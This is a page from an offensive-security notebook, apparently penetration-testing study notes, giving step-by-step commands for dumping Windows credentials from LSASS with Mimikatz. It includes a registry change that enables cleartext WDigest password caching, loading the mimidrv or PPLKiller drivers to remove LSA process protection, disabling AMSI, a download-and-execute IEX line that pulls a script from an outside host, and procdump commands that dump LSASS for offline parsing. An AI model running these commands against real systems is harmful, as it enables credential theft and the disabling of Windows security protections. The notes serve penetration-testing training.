All Gitbook

Mimikatz Abusing Kerberos

To extract credentials from memory due to caching requirements of the Kerberos protocol

Logo50 Methods For Lsass Dump(RTC0002)LinkedInEditors

Mimikatz

LogoGitHub - ParrotSec/mimikatzGitHub

We need SYSTEM (or local administrator) permissions to gain access to the hashes stored on a target Local Security Authority Subsystem Service (LSASS)

admin: SeDebugPrivilege 
whoami /priv
mimikatz.exe

sekurlsa::logonpasswords

The wdigest authentication protocol requires a clear text password, but it is disabled in Windows 8.1 and newer. We can enable it by:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

or

New-ItemProperty -Path "HKLM:SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" -Name UseLogonCredential -Value 1

The clear text password will be cached in LSASS after subsequent logins.

privilege::debug

sekurlsa::wdigest

EDRSandblast.exe credguard

Disable Protected Processes Light (PPL) if error

Check PPL
Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"

reg query hklm\SYSTEM\CurrentControlSet\Control\Lsa -v RunAsPPL

We must be local administrator or SYSTEM to dump the credentials, which means we will also have the SeLoadDriverPrivilege privilege and the ability to load any signed drivers.

We can load mimidrv.sys driver to disable PPL. (upload to victim and place in the same dir of mimikatz) *noisy*

!+
!processprotect /process:lsass.exe /remove

Alternative way to load

sc create mimidrv binPath= C:\inetpub\wwwroot\upload\mimidrv.sys type= kernel start= demand

sc start mimidrv

diable amsi

(New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/mimikatz.txt') | IEX

Invoke-Mimikatz -Command "`"!processprotect /process:lsass.exe /remove`""
alternative
PPLKiller.exe /installDriver
PPLKiller.exe /disableLSAProtection
PPLKiller.exe /uninstallDriver

Offline processing (no mimikatz in victim)

Mimikatz processing victim lsass.exe's dump in attacker machine

mimikatz.exe

sekurlsa::minidump lsass.dmp

sekurlsa::logonpasswords

When opening a dump file in Mimikatz, the target machine and the processing machine must have a matching OS and architecture.

For example, if the dumped LSASS process was from a Windows 10 64-bit machine; we must also parse it on a Windows 10 or Windows 2016/2019 64-bit machine.

However, processing the dump file requires neither an elevated command prompt nor privilege::debug.

Create dump with GUI

Create dump in command line

 -ma lsass.exe lsass.dmp 
procdump -accepteula -64 -ma lsass.exe lsass.dmp
LogoOSEP-Code-Snippets/MiniDump at main · chvancooten/OSEP-Code-SnippetsGitHub
execute it from an elevated command prompt
LogoPowerSploit/Out-Minidump.ps1 at master · PowerShellMafia/PowerSploitGitHub
alt of above

PreviousSerivce Account Access TokenNextLinux

Last updated